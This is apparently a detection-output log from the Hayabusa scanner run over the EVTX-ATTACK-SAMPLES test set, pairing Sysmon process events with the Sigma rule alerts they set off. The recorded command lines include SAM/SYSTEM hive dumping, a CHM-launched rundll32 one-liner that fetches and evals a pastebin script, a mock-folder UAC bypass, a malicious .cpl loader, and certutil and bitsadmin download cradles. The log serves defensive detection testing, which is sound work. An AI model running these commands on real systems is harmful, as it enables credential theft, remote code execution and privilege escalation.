+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
+2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
+2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
